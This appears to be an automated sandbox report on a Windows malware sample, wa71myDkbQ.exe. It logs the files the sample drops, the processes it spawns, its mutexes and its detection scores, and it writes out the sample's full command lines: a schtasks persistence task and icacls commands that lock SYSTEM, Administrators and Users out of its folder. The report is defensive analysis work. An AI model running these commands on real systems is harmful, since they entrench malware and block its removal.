Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B44F57	25_2_00B44F57
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B4301E	33_2_00B4301E
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B499C5	33_2_00B499C5
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B5F289	33_2_00B5F289
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B45BB1	33_2_00B45BB1
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B5FB09	33_2_00B5FB09
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B4E36D	33_2_00B4E36D
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B49CBF	33_2_00B49CBF
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B4A582	33_2_00B4A582
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B5C611	33_2_00B5C611
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B44F57	33_2_00B44F57
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B4301E	36_2_00B4301E
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B499C5	36_2_00B499C5
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B5F289	36_2_00B5F289
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B45BB1	36_2_00B45BB1
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B5FB09	36_2_00B5FB09
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B49CBF	36_2_00B49CBF
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B4A582	36_2_00B4A582
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B5C611	36_2_00B5C611
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B44F57	36_2_00B44F57

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: String function: 00E8B680 appears 45 times
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: String function: 00B64BBE appears 48 times
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: String function: 00B5536B appears 72 times
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: String function: 00B4B680 appears 135 times
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: String function: 00B5D965 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: String function: 0040B210 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: String function: 00424FAC appears 81 times

Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 928

Source: wa71myDkbQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wa71myDkbQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wa71myDkbQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wa71myDkbQ.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wa71myDkbQ.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wa71myDkbQ.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: wa71myDkbQ.exe	Binary or memory string: OriginalFilename vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 00000000.00000002.366956155.0000000005190000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 00000000.00000002.367136382.0000000005290000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 00000000.00000002.367136382.0000000005290000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 00000000.00000002.351844375.0000000002820000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClassLibrary1.dll: vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 00000000.00000002.366748361.0000000004CE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 00000000.00000000.229347610.0000000000332000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp4.exej% vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 00000000.00000002.364508363.00000000039B2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameKxbxzugtinf.dll" vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe	Binary or memory string: OriginalFilename vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000000.349976379.0000000000502000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameClassLibrary1.dll: vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000000.349976379.0000000000502000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp4.exej% vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.368025848.0000000003C40000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.368234681.0000000003DF0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamecomctl32.DLL.MUIj% vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.367101702.0000000002FA0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.367126578.00000000030F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.367693634.0000000003990000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.367246347.00000000034B0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.367467715.00000000035B0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.367467715.00000000035B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.368221957.0000000003DE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameDUser.DLL.MUIj% vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe, 0000000D.00000002.367553941.00000000038A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe	Binary or memory string: OriginalFilenameClassLibrary1.dll: vs wa71myDkbQ.exe
Source: wa71myDkbQ.exe	Binary or memory string: OriginalFilenameConsoleApp4.exej% vs wa71myDkbQ.exe

Source: wa71myDkbQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: wa71myDkbQ.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: wa71myDkbQ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.evad.winEXE@46/15@3/2

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

Code function: 14_2_00E89907 CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

14_2_00E89907

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wa71myDkbQ.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4336:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4060:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5044
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Mutant created: \Sessions\1\BaseNamedObjects\17134.1.x86fre.rs4_release.180410-1804_x86Maria.180502-1909
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1856:120:WilError_01

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

File created: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

Jump to behavior

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs'

Source: wa71myDkbQ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: wa71myDkbQ.exe	Virustotal: Detection: 71%
Source: wa71myDkbQ.exe	ReversingLabs: Detection: 82%

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

File read: C:\Users\user\Desktop\wa71myDkbQ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wa71myDkbQ.exe 'C:\Users\user\Desktop\wa71myDkbQ.exe'
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs'
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process created: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe 'C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe'
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'S-1-1-0:(R,REA,RA,RD)' 'S-1-5-7:(R,REA,RA,RD)'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'S-1-1-0:(R,REA,RA,RD)' 'S-1-5-7:(R,REA,RA,RD)'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)'
Source: unknown	Process created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)'
Source: unknown	Process created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)'
Source: unknown	Process created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'
Source: unknown	Process created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 928
Source: unknown	Process created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs'	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process created: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe 'C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'S-1-1-0:(R,REA,RA,RD)' 'S-1-5-7:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'S-1-1-0:(R,REA,RA,RD)' 'S-1-5-7:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)'

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: wa71myDkbQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: wa71myDkbQ.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wininet.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: winnsi.pdbT8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdbX8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdbj8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb"8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb68 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb:8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdbl8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdbR8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
